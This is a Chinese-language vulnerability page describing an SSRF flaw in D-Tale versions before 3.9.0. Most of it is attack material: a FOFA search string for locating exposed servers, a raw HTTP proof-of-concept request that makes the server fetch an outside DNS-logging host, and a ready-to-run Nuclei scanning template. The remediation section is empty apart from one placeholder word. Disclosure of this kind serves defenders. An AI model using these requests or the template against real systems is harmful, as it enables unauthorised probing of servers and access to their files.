D-Tale SSRF漏洞

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

D-Tale 是 Pandas 数据结构的可视化工具。3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击,从而使攻击者能够访问服务器上的文件。

Ⅱ、fofa语句

"dtale/static/images/favicon.png"

Ⅲ、漏洞复现

POC

GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fdnslog.cn HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

1、构建poc

D-Tale SSRF漏洞_第1张图片

2、chakanDNSlog记录

D-Tale SSRF漏洞_第2张图片

Ⅳ、Nuclei-POC

id: D-Tale-SSRF

info:
  name: 3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击 从而使攻击者能够访问服务器上的文件 3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击 从而使攻击者能够访问服务器上的文件
  author: WLF
  severity: high
  metadata: 
    fofa-query: "dtale/static/images/favicon.png"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /dtale/web-upload?type=csv&url=http%3A%2F%2F{{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and

D-Tale SSRF漏洞_第3张图片

Ⅴ、修复建议

模板

你可能感兴趣的:(安全)